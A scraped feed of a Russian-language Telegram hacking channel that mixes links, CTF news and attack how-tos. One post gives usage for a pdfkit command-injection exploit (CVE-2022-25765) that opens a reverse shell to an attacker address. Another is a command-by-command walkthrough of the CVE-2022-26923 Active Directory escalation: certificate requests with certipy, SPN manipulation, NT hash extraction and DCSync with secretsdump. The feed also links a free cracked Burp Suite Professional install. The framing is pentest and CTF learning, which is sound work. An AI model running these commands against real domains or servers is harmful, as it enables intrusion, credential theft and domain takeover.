💉Слепая SQL инъекция простыми словами на примере💉
Читать: https://teletype.in/@hackerblog/7onak0Dpwyi
#литература #полезные_материалы
Читать: https://teletype.in/@hackerblog/7onak0Dpwyi
#литература #полезные_материалы
Teletype
Blind SQLi простыми словами by artrone
Всех приветствую! В данной статье рассмотрим понятие, как "Слепая SQL инъекция". Я постараюсь очень понятным языком донести до вас всю суть.
👍8😍1
🎫Payloads на все случаи жизни🎫
Наконец-то не придется самому что-то придумывать🤷🏻♂️
Подробнее: https://github.com/swisskyrepo/PayloadsAllTheThings
#полезные_материалы #литература
Наконец-то не придется самому что-то придумывать🤷🏻♂️
Подробнее: https://github.com/swisskyrepo/PayloadsAllTheThings
#полезные_материалы #литература
GitHub
GitHub - swisskyrepo/PayloadsAllTheThings: A list of useful payloads and bypass for Web Application Security and Pentest/CTF
A list of useful payloads and bypass for Web Application Security and Pentest/CTF - swisskyrepo/PayloadsAllTheThings
🔥2👍1🥱1
Кстати, HTB запустила "Сезон открытого бета-тестирования"
Это что-то типо соревнований с рейтингом, который набирается за взлом тачек
За каждое звание от Bronze до Holo в конце сезона, который длится 3 месяца, выдаются свои плюшки
Сюда я буду выкатывать райтапы некоторых из этих тачек, поэтому вы также сможете получить призы😉
#новости #hack_the_box
Это что-то типо соревнований с рейтингом, который набирается за взлом тачек
За каждое звание от Bronze до Holo в конце сезона, который длится 3 месяца, выдаются свои плюшки
Сюда я буду выкатывать райтапы некоторых из этих тачек, поэтому вы также сможете получить призы😉
#новости #hack_the_box
🔥3
На 1к подписчиков планируется провести ребрендинг канала
Как смотрите на это?
P.S под «ребрендингом» я подразумеваю смену названия и авы канала
Как смотрите на это?
P.S под «ребрендингом» я подразумеваю смену названия и авы канала
Anonymous Poll
57%
Давай
43%
Лучше не надо
👍6
Privileger
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.
Подробнее: https://github.com/MzHmO/Privileger
#софт
Privileger позволяет вам максимально просто работать с привилегиями в ОС Windows. Присутствуют следующие режимы:
◽️Добавить привилегии аккаунту.
◽️Запустить процесс, добавив в его токен конкретную привилегию.
◽️Удалить у пользователя привилегию.
◽️Режим поиска. Позволяет обнаруживать на конкретном компьютере объекты, обладающие какой-либо привилегией.
◽️Перечислить все привилегии, которые назначены конкретному аккаунту.
Подробнее: https://github.com/MzHmO/Privileger
#софт
🔥5👍1
PDFkit-CMD-Injection (CVE-2022-25765)
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
Эксплойт для внедрения команды CVE-2022-25765 в pdfkit < 0.8.6
Использование:
nc -lvnp 1337
./CVE-2022-25765.py -t http://localhost -a 10.10.14.122 -p 1337
Флаги:
-t, --target Адрес цели в http-формате
-a, --addr Адрес для обратного соединения
-p, --port Порт для обратного соединения (9001 стандартно)
Подробнее: https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795
#CVE
GitHub
GitHub - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765: Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6
Exploit for CVE-2022-25765 command injection in pdfkit < 0.8.6 - nikn0laty/PDFkit-CMD-Injection-CVE-2022-25765
❤4👍1
Forwarded from SecurityLab.ru
Принятие законопроекта о "белых хакерах" в России, предлагающего ввести понятие bug bounty в правовое поле и изменения в Уголовный кодекс, может быть отложено из-за недовольства ФСБ и ФСТЭК. Силовые ведомства выступают против либерализации положений УК и высказали соответствующую позицию на рабочих совещаниях по законопроекту.
#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
#белыехакеры #bugbounty #Уголовныйкодекс #ФСБ #ФСТЭК
SecurityLab.ru
Законопроект о "белых хакерах" застрял на стадии обсуждения из-за позиции ФСБ
Введение понятия bug bounty в правовое поле может быть отложено.
🤯2
🦊Как установить Burp Suite Professional на Kali Linux бесплатно и использовать свой любимый браузер для работы с ним с помощью FoxyProxy🦊
Читать: https://teletype.in/@hackerblog/OPJvU17aAxW
Ссылка на репозиторий: https://github.com/SNGWN/Burp-Suite
#софт #полезные_материалы
Читать: https://teletype.in/@hackerblog/OPJvU17aAxW
Ссылка на репозиторий: https://github.com/SNGWN/Burp-Suite
#софт #полезные_материалы
Teletype
Установка Burp Suite Professoinal + FoxyProxy на Kali Linux by artrone
Всех приветствую! Сегодня я покажу вам метод установки Burp Suite Professional бесплатно и использования вашего браузера для работы...
🔥5👍3❤1
🦄Шпаргалка по использованию Hydra для разных служб🦄
Читать: https://github.com/frizb/Hydra-Cheatsheet
#литература #полезные_материалы
Читать: https://github.com/frizb/Hydra-Cheatsheet
#литература #полезные_материалы
GitHub
GitHub - frizb/Hydra-Cheatsheet: Hydra Password Cracking Cheetsheet
Hydra Password Cracking Cheetsheet. Contribute to frizb/Hydra-Cheatsheet development by creating an account on GitHub.
🔥2
Всем привет 👋
После долгого простоя, я решил продолжить вести канал.
Немного изменений:
• Новый соведущий @cherepawwka
• Канал будет в форме статей, т.е. не будет постов по типу «тулза - ссылка»
• Периодичность постов будет примерно раз в неделю-две
• Статьи будут от разных авторов, а также совместные (в том числе райтапы)
• Теперь тематика канала будет направлена на уязвимости и их эксплуатацию , а также дефенсу (как повезет)
Старый контент останется на месте, поскольку там есть что-то полезное
Ну, основные моменты я вроде перечислил.
Спасибо тем, кто остался 🤝
После долгого простоя, я решил продолжить вести канал.
Немного изменений:
• Новый соведущий @cherepawwka
• Канал будет в форме статей, т.е. не будет постов по типу «тулза - ссылка»
• Периодичность постов будет примерно раз в неделю-две
• Статьи будут от разных авторов, а также совместные (в том числе райтапы)
• Теперь тематика канала будет направлена на уязвимости и их эксплуатацию , а также дефенсу (как повезет)
Старый контент останется на месте, поскольку там есть что-то полезное
Ну, основные моменты я вроде перечислил.
Спасибо тем, кто остался 🤝
🔥18❤2
Не знаю почему, но свое возвращение хотелось бы начать с райтапа 🤨
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Тачка: Системный администратор
Категория: Active Directory
Платформа: Codeby Games
Читать: тык
UPD: Кстати, как относитесь к райтапам? Есть идея выложить целых 5 штук по этой категории на платформе Codeby. Интересно будет?
#active_directory #райтап
Teletype
Codeby Games "Системный администратор" Active Directory WriteUp by artrone
Доброго дня, мои начинающие хацкеры! В последнее время, стало популярным ломать АД. Не знаю, с чем это связано, но да ладно. Сегодня...
❤🔥7⚡1🔥1
Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
🐍 Для эксплуатации используем утилиту Certipy, краткая справка по ней представлена ниже:
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!🔺
#пентест #active_directory
Кратко поговорим об интересной уязвимости, которая позволяет нам повысить привилегии в домене.
Требования:
1. Доменная учетная запись;
2. Возможность добавлять компьютер в домен;
3. Наличие стандартного шаблона сертификата Machine;
4. Возможность изменять атрибуты учётной записи компьютера (будет по умолчанию после добавления компьютера в домен, так как мы будем владельцем объекта).
# УстановкаНачнем атаку с добавления компьютера в домен при помощи Impacket-Addcomputer
pip install certipy-ad
# Запрос сертификата
# для certipy-ad v3.0.0:
certipy req 'domain.local/username:password@dc.domain.local' -ca 'CA NAME' -template TemplateName
# для certipy-ad v4.8.2:
certipy req -u username@domain.local -p password -ca 'CA NAME' -template User -upn thm@domain.local -dc-ip 10.10.10.10
# Авторизация с сертификатом для извлечения NTLM-хэша:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10
addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'Запрашиваем сертификат для учётной записи компьютера (шаблон Machine) и авторизуемся с ним:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
certipy auth -pfx testpc.pfx
Далее заходим на любой хост домена и начинаем менять SPN у записи нашего компьютера:
Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # вернёт ошибку из-за дублирующейся SPN
Set-ADComputer TESTPC -ServicePrincipalName @{} # обнуляем SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local
Возвращаемся на атакующий хост и запрашиваем новый сертификат:
certipy req 'domain.local/TESTPC$:P@ssw0rd@dc.domain.local' -ca 'CA NAME' -template Machine
Авторизуемся с полченным сертификатом и получаем NTLM хэш учетной записи контроллера домена:
certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733
Далее осуществляем атаку DCSync любым удобным для нас способом и захватываем домен:
secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt
Вектор будет работать только в уязвимой к CVE-2022-26923 среде Active Directory, но если вы в ней оказались, то повысить привилегии будет так же просто, как, например, в случае с эксплуатацией ZeroLogon!
#пентест #active_directory
Please open Telegram to view this post
VIEW IN TELEGRAM
❤6👍1😁1